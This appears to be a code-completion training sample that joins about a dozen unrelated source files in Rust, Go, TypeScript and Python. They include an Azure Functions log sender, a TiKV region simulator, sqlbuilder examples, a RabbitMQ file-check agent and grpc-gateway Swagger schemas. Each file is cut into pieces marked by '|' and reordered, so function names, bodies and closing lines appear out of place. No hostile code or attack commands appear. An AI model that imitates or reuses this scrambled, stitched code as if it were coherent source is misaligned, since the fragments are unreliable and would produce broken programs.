let r = futures_util::future::select(push_timer_tick, stop_log_sender_rx).await;
let records = logger.take_records();
if !records.is_empty() {
#[allow(clippy::declare_interior_mutable_const)] // Clippy doesn't like const http::HeaderValue
const LOG_TYPE: http::HeaderValue = http::HeaderValue::from_static("FunctionAppLogs");
log_sender.send_logs(LOG_TYPE, records).await?;
}
match r {
futures_util::future::Either::Left((_, stop_log_sender_rx_)) => stop_log_sender_rx = stop_log_sender_rx_,
futures_util::future::Either::Right(_) => break Ok::<_, anyhow::Error>(()),
}
}
};
(stop_log_sender_tx, log_sender_f)
}
#[derive(Debug)]
enum Response {
Ok(std::borrow::Cow<'static, str>),
UnknownFunction,
MethodNotAllowed,
Error(String),
}
async fn write_response(stream: &mut (impl tokio::io::AsyncWrite + Unpin), res: &Response) -> anyhow::Result<()> {
let status = match res {
Response::Ok(_) => http::StatusCode::OK,
Response::UnknownFunction => http::StatusCode::NOT_FOUND,
Response::MethodNotAllowed => http::StatusCode::METHOD_NOT_ALLOWED,
Response::Error(_) => http::StatusCode::INTERNAL_SERVER_ERROR,
};
let mut io_slices = [
std::io::IoSlice::new(b"HTTP/1.1 "),
std::io::IoSlice::new(status.as_str().as_bytes()),
std::io::IoSlice::new(b" \r\n"),
std::io::IoSlice::new(b""), // headers
std::io::IoSlice::new(b"\r\n"),
std::io::IoSlice::new(b""), // body
];
match res {
Response::Ok(_) => {
io_slices[3] = std::io::IoSlice::new(b"content-type:application/json\r\n");
io_slices[5] = std::io::IoSlice::new(br#"{"Outputs":{"":""},"Logs":null,"ReturnValue":""}"#);
},
Response::UnknownFunction => (),
Response::MethodNotAllowed =>
io_slices[3] = std::io::IoSlice::new(b"allow:POST\r\n"),
Response::Error(err) => {
io_slices[3] = std::io::IoSlice::new(b"content-type:text/plain\r\n");
io_slices[5] = std::io::IoSlice::new(err.as_bytes());
},
}
let to_write: usize = io_slices.iter().map(|io_slice| io_slice.len()).sum();
let written = tokio::io::AsyncWriteExt::write_vectored(stream, &io_slices).await.context("could not write response")?;
if written != to_write {
// TODO:
//
// Our responses are short enough that writev is unlikely to do a short write, so this works in practice.
// But when `std::io::IoSlice::advance()` [1] becomes stable and tokio adds `AsyncWriteExt::write_all_vectored` [2],
// switch this to use that.
//
// [1]: https://github.com/rust-lang/rust/issues/62726
// [2]: https://github.com/tokio-rs/tokio/issues/3679
return Err(anyhow::anyhow!("could not write response: short write from writev ({}/{})", written, to_write));
}
let () = tokio::io::AsyncWriteExt::flush(stream).await.context("could not write response")?;
Ok(())
}
let res_f = async {
logger.report_state("function_invocation", "", format_args!("Request {{ method: {:?}, path: {:?} }}", method, path));
let res =
if method == "POST" {
match res_f.await {
Ok(Some(message)) => Response::Ok(message),
Ok(None) => Response::UnknownFunction,
Err(err) => Response::Error(format!("{:?}", err)),
}
}
else {
Response::MethodNotAllowed
};
logger.report_state("function_invocation", "", format_args!("Response {{ {:?} }}", res));
res
};
futures_util::pin_mut!(res_f);
let (stop_log_sender_tx, log_sender_f) = make_log_sender(logger, log_sender);
futures_util::pin_mut!(log_sender_f);
let res = match futures_util::future::select(res_f, log_sender_f).await {
futures_util::future::Either::Left((res, log_sender_f)) => {
let _ = stop_log_sender_tx.send(());
if let Err(err) = log_sender_f.await {
log::error!("{:?}", err.context("log sender failed"));
}
res
},
futures_util::future::Either::Right((Ok(()), _)) =>
unreachable!("log sender completed before scoped future"),
futures_util::future::Either::Right((Err(err), res_f)) => {
log::error!("{:?}", err.context("log sender failed"));
res_f.await
},
};
write_response(stream, &res).await?;
Ok(())
}
| {
if !self.enabled(record.metadata()) {
return;
}
let timestamp = chrono::Utc::now();
let level = record.level();
eprintln!("[{}] {:5} {}", timestamp.to_rfc3339_opts(chrono::SecondsFormat::Millis, true), level, record.args());
} |
index.ts | import keyBy from 'lodash/keyBy';
import { SelectColumnRenderer } from './renderer';
import { SelectConfig } from './type';
import { SelectColumnEditor } from './editor';
import * as loader from '@revolist/revo-dropdown/loader';
export default class SelectColumnType {
constructor() {
this.loadCustomComponent();
}
readonly editor = SelectColumnEditor;
beforeSetup = (col: SelectConfig) => {
if (!col.source) {
return;
}
col.sourceLookup = keyBy(col.source, col.valueKey);
}; | if (loader?.defineCustomElements) {
loader?.defineCustomElements();
}
}
}
export const CreateSelectColumnType = SelectColumnType; |
cellTemplate = SelectColumnRenderer;
private loadCustomComponent() { |
raft.go | // Copyright 2018 TiKV Project Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package simulator
import (
"context"
"sync"
"github.com/pingcap/errors"
"github.com/pingcap/kvproto/pkg/metapb"
"github.com/tikv/pd/server/core"
"github.com/tikv/pd/tools/pd-simulator/simulator/cases"
"github.com/tikv/pd/tools/pd-simulator/simulator/simutil"
"go.uber.org/zap"
)
// RaftEngine records all raft information.
type RaftEngine struct {
sync.RWMutex
regionsInfo *core.RegionsInfo
conn *Connection
regionChange map[uint64][]uint64
schedulerStats *schedulerStatistics
regionSplitSize int64
regionSplitKeys int64
storeConfig *SimConfig
useTiDBEncodedKey bool
}
// NewRaftEngine creates the initialized raft with the configuration.
func NewRaftEngine(conf *cases.Case, conn *Connection, storeConfig *SimConfig) *RaftEngine {
r := &RaftEngine{
regionsInfo: core.NewRegionsInfo(),
conn: conn,
regionChange: make(map[uint64][]uint64),
schedulerStats: newSchedulerStatistics(),
regionSplitSize: conf.RegionSplitSize,
regionSplitKeys: conf.RegionSplitKeys,
storeConfig: storeConfig,
}
var splitKeys []string
if conf.TableNumber > 0 {
splitKeys = simutil.GenerateTableKeys(conf.TableNumber, len(conf.Regions)-1)
r.useTiDBEncodedKey = true
} else {
splitKeys = simutil.GenerateKeys(len(conf.Regions) - 1)
}
for i, region := range conf.Regions {
meta := &metapb.Region{
Id: region.ID,
Peers: region.Peers,
RegionEpoch: &metapb.RegionEpoch{ConfVer: 1, Version: 1},
}
if i > 0 {
meta.StartKey = []byte(splitKeys[i-1])
}
if i < len(conf.Regions)-1 {
meta.EndKey = []byte(splitKeys[i])
}
regionInfo := core.NewRegionInfo(
meta,
region.Leader,
core.SetApproximateSize(region.Size),
core.SetApproximateKeys(region.Keys),
)
r.SetRegion(regionInfo)
peers := region.Peers
regionSize := uint64(region.Size)
for _, peer := range peers {
r.conn.Nodes[peer.StoreId].incUsedSize(regionSize)
}
}
for _, node := range conn.Nodes {
node.raftEngine = r
}
return r
}
func (r *RaftEngine) stepRegions() {
regions := r.GetRegions()
for _, region := range regions {
r.stepLeader(region)
r.stepSplit(region)
}
}
func (r *RaftEngine) stepLeader(region *core.RegionInfo) {
if region.GetLeader() != nil && r.conn.nodeHealth(region.GetLeader().GetStoreId()) {
return
}
newLeader := r.electNewLeader(region)
newRegion := region.Clone(core.WithLeader(newLeader))
if newLeader == nil {
r.SetRegion(newRegion)
simutil.Logger.Info("region has no leader", zap.Uint64("region-id", region.GetID()))
return
}
simutil.Logger.Info("region elects a new leader",
zap.Uint64("region-id", region.GetID()),
zap.Reflect("new-leader", newLeader),
zap.Reflect("old-leader", region.GetLeader()))
r.SetRegion(newRegion)
r.recordRegionChange(newRegion)
}
func (r *RaftEngine) stepSplit(region *core.RegionInfo) {
if region.GetLeader() == nil {
return
}
if !r.NeedSplit(region.GetApproximateSize(), region.GetApproximateKeys()) {
return
}
var err error
ids := make([]uint64, 1+len(region.GetPeers()))
for i := range ids {
ids[i], err = r.allocID(region.GetLeader().GetStoreId())
if err != nil {
simutil.Logger.Error("alloc id failed", zap.Error(err))
return
}
}
var splitKey []byte
if r.useTiDBEncodedKey {
splitKey, err = simutil.GenerateTiDBEncodedSplitKey(region.GetStartKey(), region.GetEndKey())
if err != nil {
simutil.Logger.Fatal("generate TiDB encoded split key failed", zap.Error(err))
}
} else {
splitKey = simutil.GenerateSplitKey(region.GetStartKey(), region.GetEndKey())
}
left := region.Clone(
core.WithNewRegionID(ids[len(ids)-1]),
core.WithNewPeerIds(ids[0:len(ids)-1]...),
core.WithIncVersion(),
core.SetApproximateKeys(region.GetApproximateKeys()/2),
core.SetApproximateSize(region.GetApproximateSize()/2),
core.WithPendingPeers(nil),
core.WithDownPeers(nil),
core.WithEndKey(splitKey),
)
right := region.Clone(
core.WithIncVersion(),
core.SetApproximateKeys(region.GetApproximateKeys()/2),
core.SetApproximateSize(region.GetApproximateSize()/2),
core.WithStartKey(splitKey),
)
r.SetRegion(right)
r.SetRegion(left)
simutil.Logger.Debug("region split",
zap.Uint64("region-id", region.GetID()),
zap.Reflect("origin", region.GetMeta()),
zap.Reflect("left", left.GetMeta()),
zap.Reflect("right", right.GetMeta()))
r.recordRegionChange(left)
r.recordRegionChange(right)
}
// NeedSplit checks whether the region needs to split according its size
// and number of keys.
func (r *RaftEngine) NeedSplit(size, rows int64) bool {
if r.regionSplitSize != 0 && size >= r.regionSplitSize {
return true
}
if r.regionSplitKeys != 0 && rows >= r.regionSplitKeys {
return true
}
return false
}
func (r *RaftEngine) recordRegionChange(region *core.RegionInfo) {
r.Lock()
defer r.Unlock()
n := region.GetLeader().GetStoreId()
r.regionChange[n] = append(r.regionChange[n], region.GetID())
}
func (r *RaftEngine) updateRegionStore(region *core.RegionInfo, size int64) {
newRegion := region.Clone(
core.SetApproximateSize(region.GetApproximateSize()+size),
core.SetWrittenBytes(uint64(size)),
)
storeIDs := region.GetStoreIds()
for storeID := range storeIDs {
r.conn.Nodes[storeID].incUsedSize(uint64(size))
}
r.SetRegion(newRegion)
}
func (r *RaftEngine) updateRegionReadBytes(readBytes map[uint64]int64) {
for id, bytes := range readBytes {
region := r.GetRegion(id)
if region == nil {
simutil.Logger.Error("region is not found", zap.Uint64("region-id", id))
continue
}
newRegion := region.Clone(core.SetReadBytes(uint64(bytes)))
r.SetRegion(newRegion)
}
}
func (r *RaftEngine) electNewLeader(region *core.RegionInfo) *metapb.Peer {
var (
unhealthy int
newLeaderStoreID uint64
)
ids := region.GetStoreIds()
for id := range ids {
if r.conn.nodeHealth(id) {
newLeaderStoreID = id
} else {
unhealthy++
}
}
if unhealthy > len(ids)/2 {
return nil
}
for _, peer := range region.GetPeers() {
if peer.GetStoreId() == newLeaderStoreID {
return peer
}
}
return nil
}
// GetRegion returns the RegionInfo with regionID.
func (r *RaftEngine) GetRegion(regionID uint64) *core.RegionInfo {
r.RLock()
defer r.RUnlock() | func (r *RaftEngine) GetRegionChange(storeID uint64) []uint64 {
r.RLock()
defer r.RUnlock()
return r.regionChange[storeID]
}
// ResetRegionChange resets RegionInfo on a specific store with a given Region ID
func (r *RaftEngine) ResetRegionChange(storeID uint64, regionID uint64) {
r.Lock()
defer r.Unlock()
regionIDs := r.regionChange[storeID]
for i, id := range regionIDs {
if id == regionID {
r.regionChange[storeID] = append(r.regionChange[storeID][:i], r.regionChange[storeID][i+1:]...)
return
}
}
}
// GetRegions gets all RegionInfo from regionMap
func (r *RaftEngine) GetRegions() []*core.RegionInfo {
r.RLock()
defer r.RUnlock()
return r.regionsInfo.GetRegions()
}
// SetRegion sets the RegionInfo with regionID
func (r *RaftEngine) SetRegion(region *core.RegionInfo) []*core.RegionInfo {
r.Lock()
defer r.Unlock()
return r.regionsInfo.SetRegion(region)
}
// GetRegionByKey searches the RegionInfo from regionTree
func (r *RaftEngine) GetRegionByKey(regionKey []byte) *core.RegionInfo {
r.RLock()
defer r.RUnlock()
return r.regionsInfo.GetRegionByKey(regionKey)
}
// BootstrapRegion gets a region to construct bootstrap info.
func (r *RaftEngine) BootstrapRegion() *core.RegionInfo {
r.RLock()
defer r.RUnlock()
regions := r.regionsInfo.ScanRange(nil, nil, 1)
if len(regions) > 0 {
return regions[0]
}
return nil
}
func (r *RaftEngine) allocID(storeID uint64) (uint64, error) {
node, ok := r.conn.Nodes[storeID]
if !ok {
return 0, errors.Errorf("node %d not found", storeID)
}
id, err := node.client.AllocID(context.Background())
return id, errors.WithStack(err)
} | return r.regionsInfo.GetRegion(regionID)
}
// GetRegionChange returns a list of RegionID for a given store. |
inspect.py | import datetime
import copy
import pprint
from .base import CommandBase
from akebono.inspector import get_scenario_summary
def _get_fixed_length_str(s, length):
if not isinstance(s, str):
raise TypeError('invalid type')
l = length - len(s)
if l < 0:
raise Exception('invalid length')
return s + (' ' * l)
class Inspect(CommandBase):
def apply_arguments(self, parser):
parser.add_argument('-c', '--config', default='config')
parser.add_argument('-t', '--scenario-tag', default='default')
parser.add_argument('-k', '--performance-sort-key', default=None)
parser.add_argument('-v', '--verbose', action='store_true', default=False)
def execute(self, namespace):
| ss = get_scenario_summary(namespace.scenario_tag, namespace.performance_sort_key)
print('=== scenario summary .. tag: {} ==='.format(namespace.scenario_tag))
for idx, row in ss.iterrows():
print('')
print('------------------------------------------------------------')
train_id = row['_akebono_train']['id']
print('train_id: {}'.format(train_id))
print('')
if namespace.verbose:
pprint.pprint(row['_akebono_train'])
print('')
attrs = list(row.index.copy())
attrs.remove('_akebono_train')
alen = max([len(a) for a in attrs] + [8])
v1 = ' '.join([_get_fixed_length_str(a, alen) for a in attrs])
v2 = ' '.join([_get_fixed_length_str('{:.5f}'.format(row[a]), alen) for a in attrs])
print(v1)
print(v2)
print('') |
|
blocksigs_test.go | package blockdb
import (
"testing"
"github.com/boltdb/bolt"
"github.com/stretchr/testify/require"
"github.com/spo-next/spo/src/cipher"
"github.com/spo-next/spo/src/cipher/encoder"
"github.com/spo-next/spo/src/testutil"
)
func TestNewBlockSigs(t *testing.T) |
func TestBlockSigsGet(t *testing.T) {
type hashSig struct {
hash cipher.SHA256
sig cipher.Sig
}
type expect struct {
exist bool
sig cipher.Sig
err error
}
hashSigs := []hashSig{}
for i := 0; i < 5; i++ {
_, s := cipher.GenerateKeyPair()
h := testutil.RandSHA256(t)
sig := cipher.SignHash(h, s)
hashSigs = append(hashSigs, hashSig{
hash: h,
sig: sig,
})
}
tt := []struct {
name string
init []hashSig
hash cipher.SHA256
expect expect
}{
{
"ok",
hashSigs[:],
hashSigs[0].hash,
expect{
true,
hashSigs[0].sig,
nil,
},
},
{
"not exist",
hashSigs[1:],
hashSigs[0].hash,
expect{
false,
cipher.Sig{},
nil,
},
},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
db, closeDB := testutil.PrepareDB(t)
defer closeDB()
// init db
db.Update(func(tx *bolt.Tx) error {
bkt, err := tx.CreateBucketIfNotExists(blockSigsBkt)
require.NoError(t, err)
for _, hs := range tc.init {
err = bkt.Put(hs.hash[:], encoder.Serialize(hs.sig))
require.NoError(t, err)
}
return nil
})
sigs, err := newBlockSigs(db)
require.NoError(t, err)
sg, ok, err := sigs.Get(tc.hash)
require.Equal(t, tc.expect.err, err)
require.Equal(t, tc.expect.exist, ok)
if ok {
require.Equal(t, tc.expect.sig, sg)
}
})
}
}
func TestBlockSigsAddWithTx(t *testing.T) {
db, closeDB := testutil.PrepareDB(t)
defer closeDB()
_, s := cipher.GenerateKeyPair()
h := testutil.RandSHA256(t)
sig := cipher.SignHash(h, s)
sigs, err := newBlockSigs(db)
require.NoError(t, err)
db.Update(func(tx *bolt.Tx) error {
return sigs.AddWithTx(tx, h, sig)
})
// check the db
db.View(func(tx *bolt.Tx) error {
bkt := tx.Bucket(blockSigsBkt)
v := bkt.Get(h[:])
require.NotNil(t, v)
var s cipher.Sig
err := encoder.DeserializeRaw(v, &s)
require.NoError(t, err)
require.Equal(t, sig, s)
return nil
})
}
| {
db, closeDB := testutil.PrepareDB(t)
defer closeDB()
sigs, err := newBlockSigs(db)
require.NoError(t, err)
require.NotNil(t, sigs)
// check the bucket
require.NotNil(t, sigs.Sigs)
db.View(func(tx *bolt.Tx) error {
bkt := tx.Bucket(blockSigsBkt)
require.NotNil(t, bkt)
return nil
})
} |
select_test.go | // Copyright 2018 Huan Du. All rights reserved.
// Licensed under the MIT license that can be found in the LICENSE file.
package sqlbuilder
import (
"database/sql"
"fmt"
)
func ExampleSelectBuilder() {
sb := NewSelectBuilder()
sb.Distinct().Select("id", "name", sb.As("COUNT(*)", "t"))
sb.From("demo.user")
sb.Where(
sb.GreaterThan("id", 1234),
sb.Like("name", "%Du"),
sb.Or(
sb.IsNull("id_card"),
sb.In("status", 1, 2, 5),
),
sb.NotIn(
"id",
NewSelectBuilder().Select("id").From("banned"),
), // Nested SELECT. | "modified_at > created_at + "+sb.Var(86400), // It's allowed to write arbitrary SQL.
)
sb.GroupBy("status").Having(sb.NotIn("status", 4, 5))
sb.OrderBy("modified_at").Asc()
sb.Limit(10).Offset(5)
sql, args := sb.Build()
fmt.Println(sql)
fmt.Println(args)
// Output:
// SELECT DISTINCT id, name, COUNT(*) AS t FROM demo.user WHERE id > ? AND name LIKE ? AND (id_card IS NULL OR status IN (?, ?, ?)) AND id NOT IN (SELECT id FROM banned) AND modified_at > created_at + ? GROUP BY status HAVING status NOT IN (?, ?) ORDER BY modified_at ASC LIMIT 10 OFFSET 5
// [1234 %Du 1 2 5 86400 4 5]
}
func ExampleSelectBuilder_advancedUsage() {
sb := NewSelectBuilder()
innerSb := NewSelectBuilder()
sb.Select("id", "name")
sb.From(
sb.BuilderAs(innerSb, "user"),
)
sb.Where(
sb.In("status", Flatten([]int{1, 2, 3})...),
sb.Between("created_at", sql.Named("start", 1234567890), sql.Named("end", 1234599999)),
)
sb.OrderBy("modified_at").Desc()
innerSb.Select("*")
innerSb.From("banned")
innerSb.Where(
innerSb.NotIn("name", Flatten([]string{"Huan Du", "Charmy Liu"})...),
)
sql, args := sb.Build()
fmt.Println(sql)
fmt.Println(args)
// Output:
// SELECT id, name FROM (SELECT * FROM banned WHERE name NOT IN (?, ?)) AS user WHERE status IN (?, ?, ?) AND created_at BETWEEN @start AND @end ORDER BY modified_at DESC
// [Huan Du Charmy Liu 1 2 3 {{} start 1234567890} {{} end 1234599999}]
}
func ExampleSelectBuilder_join() {
sb := NewSelectBuilder()
sb.Select("u.id", "u.name", "c.type", "p.nickname")
sb.From("user u")
sb.Join("contract c",
"u.id = c.user_id",
sb.In("c.status", 1, 2, 5),
)
sb.JoinWithOption(RightOuterJoin, "person p",
"u.id = p.user_id",
sb.Like("p.surname", "%Du"),
)
sb.Where(
"u.modified_at > u.created_at + " + sb.Var(86400), // It's allowed to write arbitrary SQL.
)
sql, args := sb.Build()
fmt.Println(sql)
fmt.Println(args)
// Output:
// SELECT u.id, u.name, c.type, p.nickname FROM user u JOIN contract c ON u.id = c.user_id AND c.status IN (?, ?, ?) RIGHT OUTER JOIN person p ON u.id = p.user_id AND p.surname LIKE ? WHERE u.modified_at > u.created_at + ?
// [1 2 5 %Du 86400]
} | |
forms.py | from django import forms
from django.forms import ModelForm
| fields='__all__' | from .models import *
class TodoForm(forms.ModelForm):
class Meta:
model=Todo
|
mod.rs | /*!
Private extensions for `Stream` for collecting
keys, values, and sequences that are known upfront.
This is useful for `serde` integration where we can avoid
allocating for nested datastructures that are already known.
*/
use crate::stream::{
self,
Stream,
};
mod owned;
mod value;
#[doc(inline)]
pub use crate::Error;
pub(crate) use self::{
owned::{
OwnedCollect,
RefMutCollect,
},
value::Value,
};
// FIXME: Moving the `*_collect` methods onto the base `Stream`
// trait is a little more efficient (a few % improvement against `serde`)
// in the general case because it can save a virtual call per key/value/elem.
// The reason this hasn't been done already is just to reduce
// the API surface area for now. It should be revisited sometime.
// The `Value` type that's passed in would need some more attention.
/**
An extension to `Stream` for items that are known upfront.
*/
pub(crate) trait Collect: Stream {
fn map_key_collect(&mut self, k: Value) -> Result;
fn map_value_collect(&mut self, v: Value) -> Result;
fn seq_elem_collect(&mut self, v: Value) -> Result;
}
impl<'a, S: ?Sized> Collect for &'a mut S
where
S: Collect,
{
#[inline]
fn map_key_collect(&mut self, k: Value) -> Result {
(**self).map_key_collect(k)
}
#[inline]
fn map_value_collect(&mut self, v: Value) -> Result {
(**self).map_value_collect(v)
}
#[inline]
fn | (&mut self, v: Value) -> Result {
(**self).seq_elem_collect(v)
}
}
/**
Default implementations for stream extensions.
*/
pub(crate) struct Default<S>(pub(crate) S);
impl<S> Collect for Default<S>
where
S: Stream,
{
#[inline]
fn map_key_collect(&mut self, k: Value) -> Result {
Stream::map_key(self)?;
k.stream(self)
}
#[inline]
fn map_value_collect(&mut self, v: Value) -> Result {
Stream::map_value(self)?;
v.stream(self)
}
#[inline]
fn seq_elem_collect(&mut self, v: Value) -> Result {
Stream::seq_elem(self)?;
v.stream(self)
}
}
impl<S> Stream for Default<S>
where
S: Stream,
{
#[inline]
fn fmt(&mut self, args: stream::Arguments) -> Result {
self.0.fmt(args)
}
#[inline]
fn i64(&mut self, v: i64) -> Result {
self.0.i64(v)
}
#[inline]
fn u64(&mut self, v: u64) -> Result {
self.0.u64(v)
}
#[inline]
fn i128(&mut self, v: i128) -> Result {
self.0.i128(v)
}
#[inline]
fn u128(&mut self, v: u128) -> Result {
self.0.u128(v)
}
#[inline]
fn f64(&mut self, v: f64) -> Result {
self.0.f64(v)
}
#[inline]
fn bool(&mut self, v: bool) -> Result {
self.0.bool(v)
}
#[inline]
fn char(&mut self, v: char) -> Result {
self.0.char(v)
}
#[inline]
fn str(&mut self, v: &str) -> Result {
self.0.str(v)
}
#[inline]
fn none(&mut self) -> Result {
self.0.none()
}
#[inline]
fn map_begin(&mut self, len: Option<usize>) -> Result {
self.0.map_begin(len)
}
#[inline]
fn map_key(&mut self) -> Result {
self.0.map_key()
}
#[inline]
fn map_value(&mut self) -> Result {
self.0.map_value()
}
#[inline]
fn map_end(&mut self) -> Result {
self.0.map_end()
}
#[inline]
fn seq_begin(&mut self, len: Option<usize>) -> Result {
self.0.seq_begin(len)
}
#[inline]
fn seq_elem(&mut self) -> Result {
self.0.seq_elem()
}
#[inline]
fn seq_end(&mut self) -> Result {
self.0.seq_end()
}
}
pub type Result = crate::std::result::Result<(), Error>;
| seq_elem_collect |
agent.go |
package main
// ---------------------------------------------------------------------------------------------------------------------
import "bytes"
import "encoding/json"
import "fmt"
import "github.com/streadway/amqp"
import "io/ioutil"
import "log"
import "net"
import "net/http"
import "os"
import "strings"
// ---------------------------------------------------------------------------------------------------------------------
const CONFIGURATION_FILE string = "config.json"
var ipAddress string
// ---------------------------------------------------------------------------------------------------------------------
func failOnError(err error, msg string) {
if err != nil {
log.Fatalf("%s: %s", msg, err)
panic(fmt.Sprintf("%s: %s", msg, err))
}
}
// ---------------------------------------------------------------------------------------------------------------------
type Configuration struct {
Controller string
MqConnString string
}
// ---------------------------------------------------------------------------------------------------------------------
type OperationRequest struct {
Operation uint8
FilePath string
Term string
}
// ---------------------------------------------------------------------------------------------------------------------
type OperationMessage struct {
Request OperationRequest
Uuid string
}
// ---------------------------------------------------------------------------------------------------------------------
type OperationReply struct {
State bool
Uuid string
IpAddress string
}
// ---------------------------------------------------------------------------------------------------------------------
func reply(controller string, uuid string, state bool) {
operationReply := OperationReply {
State : state,
Uuid : uuid,
IpAddress : ipAddress,
}
messageBytes, err := json.Marshal(operationReply)
if err != nil {
log.Println("Seialization error")
return
}
resp, err := http.Post("http://" + controller + "/reply", "application/json", bytes.NewBuffer(messageBytes))
if err != nil {
log.Println("Cannot send reply")
}
if (resp.StatusCode != 200) {
log.Println("Reply send failed.")
}
}
// ---------------------------------------------------------------------------------------------------------------------
func processMessage(controller string, message []byte) {
operationMessage := OperationMessage{}
err := json.Unmarshal(message, &operationMessage)
if err != nil {
log.Println("JSON Decoding error")
}
operationRequest := operationMessage.Request
uuid := operationMessage.Uuid
if operationRequest.Operation == 1 {
if _, err := os.Stat(operationRequest.FilePath); err == nil {
reply(controller, uuid, true)
} else {
reply(controller, uuid, false)
}
} else if (operationRequest.Operation == 2) {
if _, err := os.Stat(operationRequest.FilePath); err == nil {
content, err := ioutil.ReadFile(operationRequest.FilePath)
if err != nil {
log.Println("Cannot read file")
reply(controller, uuid, false)
}
if strings.Contains(string(content), operationRequest.Term) {
reply(controller, uuid, true)
} else {
reply(controller, uuid, false)
}
} else {
reply(controller, uuid, false)
}
}
}
// ---------------------------------------------------------------------------------------------------------------------
func connectToMq(controller string, mqConnString string) {
connection, err := amqp.Dial(mqConnString)
failOnError(err, "Failed to connect to RabbitMQ")
defer connection.Close()
channel, err := connection.Channel()
failOnError(err, "Failed to open a channel")
defer channel.Close()
err = channel.ExchangeDeclare(
"kodayif", // name
"fanout", // type
true , // durable
false, // auto-deleted
false, // internal
false, // no-wait
nil, // arguments
)
failOnError(err, "Failed to declare an exchange")
queue, err := channel.QueueDeclare(
"", // name
false, // durable
false, // delete when usused
true, // exclusive
false, // no-wait
nil, // arguments
)
failOnError(err, "Failed to declare a queue")
err = channel.QueueBind(
queue.Name, // queue name
"", // routing key
"kodayif", // exchange
false,
nil,
)
failOnError(err, "Failed to bind a queue")
msgs, err := channel.Consume(
queue.Name, // queue
"", // consumer
true, // auto-ack
false, // exclusive
false, // no-local
false, // no-wait
nil, // args
)
failOnError(err, "Failed to register a consumer")
forever := make(chan bool)
go func() {
for msg := range msgs {
processMessage(controller, msg.Body)
}
}()
log.Printf(" [*] Waiting for messages. To exit press CTRL+C")
<-forever
}
// ---------------------------------------------------------------------------------------------------------------------
func | () Configuration {
file, err := os.Open(CONFIGURATION_FILE)
if err != nil {
log.Fatal("Couldn't read config file!")
}
decoder := json.NewDecoder(file)
configuration := Configuration{}
err = decoder.Decode(&configuration)
if err != nil {
log.Fatal("Syntax error in configuration file.")
}
return configuration
}
// ----------------------------------------------------------------------------------------------------------------xx-
func ipLookUp() string {
interfaces, err := net.Interfaces()
if err != nil {
log.Println("Couln't fetch interface list")
}
for _, i := range interfaces {
addrs, _ := i.Addrs()
for _, addr := range addrs {
address := addr.String()
if !strings.HasPrefix(address, "127") && !strings.HasPrefix(address, ":") {
return strings.Split(address, "/")[0]
}
}
}
return ""
}
// ----------------------------------------------------------------------------------------------------------------xx-
func main() {
ipAddress = ipLookUp()
if (ipAddress == "") {
log.Fatal("Couldn't find a valid interface address")
}
configuration := parseConfiguration()
connectToMq(configuration.Controller, configuration.MqConnString)
}
| parseConfiguration |
bytes.rs | use byteorder::{ByteOrder, LittleEndian};
// Encode unescaped with correct endian-ness
pub fn write_esc_u32(buf: &mut Vec<u8>,
x: u32) -> usize {
let mut unescaped_buf = [0; 4];
LittleEndian::write_u32(&mut unescaped_buf, x);
write_esc(buf, &unescaped_buf)
}
// Encode unescaped with correct endian-ness
pub fn write_esc_u64(buf: &mut Vec<u8>,
x: u64) -> usize {
let mut unescaped_buf = [0; 8];
LittleEndian::write_u64(&mut unescaped_buf, x);
write_esc(buf, &unescaped_buf)
}
pub fn write_esc(buf: &mut Vec<u8>,
bytes: &[u8]) -> usize {
let mut written = 0;
for b in bytes {
match *b {
10 => { buf.push(b'\\');
buf.push(b'n');
written += 2;
},
13 => { buf.push(b'\\');
buf.push(b'r');
written += 2;
},
92 => { buf.push(b'\\');
buf.push(b'\\');
written += 2;
},
_ => { buf.push(*b);
written += 1;
}
}
}
written
}
pub fn read_esc_u32_at(input: &[u8], j: usize) -> (u32, usize) {
let mut buf = Vec::<u8>::new();
let mut esc = false;
let mut read = 0;
let mut i = j;
while read < 4 {
let c = input[i];
i += 1;
if esc {
esc = false;
match c {
b'n' => buf.push(10),
b'r' => buf.push(13),
b'\\' => buf.push(92),
o => panic!("Invalid escape!: {}", o)
}
read += 1;
} else {
if c == 92 | else {
buf.push(c);
read += 1;
}
}
}
(LittleEndian::read_u32(&buf), i - j)
}
pub fn read_esc_u64_at(input: &[u8], j: usize) -> (u64, usize) {
let mut buf = Vec::<u8>::new();
let mut esc = false;
let mut read = 0;
let mut i = j;
while read < 8 {
let c = input[i];
i += 1;
if esc {
esc = false;
match c {
b'n' => buf.push(10),
b'r' => buf.push(13),
b'\\' => buf.push(92),
o => panic!("Invalid escape!: {}", o)
}
read += 1;
} else {
if c == 92 {
esc = true;
} else {
buf.push(c);
read += 1;
}
}
}
(LittleEndian::read_u64(&buf), i - j)
} | {
esc = true;
} |
box.ts | export class | {
index: number;
constructor(index: number) {
this.index = index;
}
} | Box |
template.go | package genswagger
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"os"
"reflect"
"regexp"
"sort"
"strconv"
"strings"
"sync"
"text/template"
"github.com/golang/glog"
"github.com/golang/protobuf/jsonpb"
"github.com/golang/protobuf/proto"
pbdescriptor "github.com/golang/protobuf/protoc-gen-go/descriptor"
structpb "github.com/golang/protobuf/ptypes/struct"
"github.com/grpc-ecosystem/grpc-gateway/internal/casing"
"github.com/grpc-ecosystem/grpc-gateway/protoc-gen-grpc-gateway/descriptor"
swagger_options "github.com/grpc-ecosystem/grpc-gateway/protoc-gen-swagger/options"
)
var wktSchemas = map[string]schemaCore{
".google.protobuf.Timestamp": schemaCore{
Type: "string",
Format: "date-time",
},
".google.protobuf.Duration": schemaCore{
Type: "string",
},
".google.protobuf.StringValue": schemaCore{
Type: "string",
},
".google.protobuf.BytesValue": schemaCore{
Type: "string",
Format: "byte",
},
".google.protobuf.Int32Value": schemaCore{
Type: "integer",
Format: "int32",
},
".google.protobuf.UInt32Value": schemaCore{
Type: "integer",
Format: "int64",
},
".google.protobuf.Int64Value": schemaCore{
Type: "string",
Format: "int64",
},
".google.protobuf.UInt64Value": schemaCore{
Type: "string",
Format: "uint64",
},
".google.protobuf.FloatValue": schemaCore{
Type: "number",
Format: "float",
},
".google.protobuf.DoubleValue": schemaCore{
Type: "number",
Format: "double",
},
".google.protobuf.BoolValue": schemaCore{
Type: "boolean",
Format: "boolean",
},
